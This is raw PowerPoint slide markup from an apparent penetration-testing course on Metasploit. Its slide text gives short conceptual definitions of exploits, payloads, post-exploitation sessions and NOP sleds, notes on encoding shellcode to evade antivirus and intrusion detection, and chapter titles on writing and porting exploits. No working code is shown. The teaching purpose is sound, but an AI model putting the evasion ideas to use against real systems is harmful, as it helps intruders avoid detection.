              <a:off x="3402" y="4078025"/>
              <a:ext cx="1807958" cy="941082"/>
            </a:xfrm>
            <a:prstGeom prst="homePlate">
              <a:avLst>
                <a:gd name="adj" fmla="val 25000"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln>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Arrow: Pentagon 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{572304C9-B3D2-208E-A3FA-5D9793463C74}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3402" y="4078025"/>
              <a:ext cx="1690323"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b="1" i="1" u="sng" kern="1200" dirty="0">
                  <a:effectLst>
                    <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                      <a:schemeClr val="tx1">
                        <a:alpha val="50000"/>
                      </a:schemeClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>Information</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" i="1" u="sng" dirty="0">
                  <a:effectLst>
                    <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                      <a:schemeClr val="tx1">
                        <a:alpha val="50000"/>
                      </a:schemeClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t> Gathering</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" b="1" i="1" u="sng" kern="1200" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="tx1">
                      <a:alpha val="50000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mj-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Group 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8314578D-9D0F-9EFF-349B-BCC102368665}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5227957" y="75300"/>
            <a:ext cx="1807958" cy="941082"/>
            <a:chOff x="3438524" y="4078025"/>
            <a:chExt cx="1807958" cy="941082"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Arrow: Chevron 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07C9ABCC-95AF-3F19-71DA-81FC12D21BCA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3438524" y="4078025"/>
              <a:ext cx="1807958" cy="941082"/>
            </a:xfrm>
            <a:prstGeom prst="chevron">
              <a:avLst>
                <a:gd name="adj" fmla="val 25000"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent3"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="accent3"/>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9" name="Arrow: Chevron 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7A61827-C94F-69A1-9130-A8E3CB756B69}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3673795"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i="1" u="sng" kern="1200" dirty="0">
                  <a:effectLst>
                    <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                      <a:schemeClr val="tx1">
                        <a:alpha val="50000"/>
                      </a:schemeClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>Scan</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="Group 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{556D4F96-DE1C-2C73-9694-395C8A45A2D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10302424" y="75300"/>
            <a:ext cx="1807958" cy="941082"/>
            <a:chOff x="6873645" y="4078025"/>
            <a:chExt cx="1807958" cy="941082"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Arrow: Chevron 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D206324-2C4B-251A-3FB7-6BC20997ECB4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6873645" y="4078025"/>
              <a:ext cx="1807958" cy="941082"/>
            </a:xfrm>
            <a:prstGeom prst="chevron">
              <a:avLst>
                <a:gd name="adj" fmla="val 25000"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent5"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solid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12" name="Arrow: Chevron 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4C78AB1-7376-91C0-988A-5902E1E89C90}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7108916"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i="1" u="sng" dirty="0">
                  <a:effectLst>
                    <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                      <a:schemeClr val="tx1">
                        <a:alpha val="50000"/>
                      </a:schemeClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>Exploit</a:t>
              </a:r>
              <a:endParaRPr lang="ru-RU" sz="2000" b="1" i="1" u="sng" kern="1200" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="tx1">
                      <a:alpha val="50000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mj-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DE7D59B-9505-1B26-63DE-5EDF4427EFDB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="153490" y="2918663"/>
            <a:ext cx="1443489" cy="2462213"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>An exploit executes a sequence of commands that target a specific vulnerability found in a system or application to provide the attacker with access to the system. Exploits include buffer overflow, code injection, and web application exploits.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BE36CC2-10D1-A460-2DCE-33171039B074}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1843813" y="2918663"/>
            <a:ext cx="1443489" cy="2462213"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The Metasploit Framework includes hundreds of auxiliary modules that perform scanning, fuzzing, sniffing, and much more. Although these modules will not give you a shell, they are extremely valuable when conducting a penetration test.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81BC1CCA-CCD4-00D5-3483-6C95D4485E67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3573615" y="2918663"/>
            <a:ext cx="1654342" cy="1954381"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Post-exploitation refers to any actions taken after a session is opened. A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is an open shell from a successful exploit or bruteforce attack. A shell can be a standard shell or Meterpreter. To learn more about the difference </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D48062C0-0A7C-B4D0-AFD2-6DA9DA9DBB23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5268829" y="2918663"/>
            <a:ext cx="1654342" cy="1446550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Payload, in simple terms, are simple scripts that the hackers utilize to interact with a hacked system. Using payloads, they can transfer data to a victim system.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF664151-0A8C-4D26-F7C9-3C7EB4110A22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6923171" y="2883572"/>
            <a:ext cx="1709487" cy="2462213"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Generating payloads is just the first step; nowadays security products, such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Intrusion Detection Systems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IDSs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>), antivirus and anti-malware software, can easily pick up the shellcode generated by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MSFvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. To help us evade security, we can use encoders to encode our shellcode.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED08179C-F238-5585-8E61-50C80A027DC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="8632658" y="2766605"/>
            <a:ext cx="180473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Arial Unicode MS"/>
              </a:rPr>
              <a:t>NOPs</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> or NOP-sled are No Operation instructions that simply slide the program execution to the next memory address. We use </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>NOPs</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> to reach the desired place in the memory addresses. We supply </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>NOPs</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> commonly before the start of the </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>ShellCode</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> to ensure its successful execution in the memory while performing no operations and just sliding through the memory addresses. </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{336F755E-1E0D-2BE2-08CB-1EC0AADBAE04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10437395" y="2902626"/>
            <a:ext cx="1479885" cy="769441"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AV Bypass with Metasploit Templates and Custom Binaries</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33586455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797886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2837095" y="0"/>
            <a:ext cx="6517810" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Chapter 13</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>B U I L D I N G  Y O U R  O W N  M O D U L E</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="24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134391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604535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863871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2727674" y="0"/>
            <a:ext cx="6736652" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Chapter 14</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> R E A T I N G  Y O U R  O W N  E X P L O I T S</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="24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54721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203852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4215000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3256857" y="0"/>
            <a:ext cx="5678286" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Chapter 15</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>P O R T I N G E X P L O I T S T O T H E</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pt-BR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>M E T A S P L O I T F R A M E W O R K</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="24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604762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9541774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11283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251CF0B1-E4FB-FB9A-0C02-3C92828BE87D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1957687" y="366459"/>
            <a:ext cx="82766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effectLst/>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>Different Metasploit interfaces</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" b="1" i="1" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16" name="Group 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6AE40AD-4BFF-13BB-1CC6-D0BC5547DB7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="7977138" y="3615815"/>
            <a:ext cx="3916266" cy="3240959"/>
            <a:chOff x="507" y="1182"/>
            <a:chExt cx="3091" cy="2558"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="AutoShape 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{413566AF-FA23-9419-BA39-80C190E3502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8" name="Freeform 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5F1D459-A0D4-5CC1-6B3E-660B6F7BB938}"/>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19" name="Freeform 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D263894-B246-4489-7EED-79120B2EF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0" name="Freeform 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF36A7B2-3478-D2D3-B64A-5C4F7B957B0F}"/>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1" name="Freeform 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91933CE0-2B4B-E80F-76C4-FE7C6B6BD97C}"/>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22" name="Freeform 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81FACFB4-603D-BD34-D16A-263B78E1ADE5}"/>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956F0983-779A-D597-FF68-38FBC7790D81}"/>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0B64A163-3E9F-BDF0-E35C-0281376B1279}"/>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7015D5E3-852E-F7EC-17CE-510238AB062F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
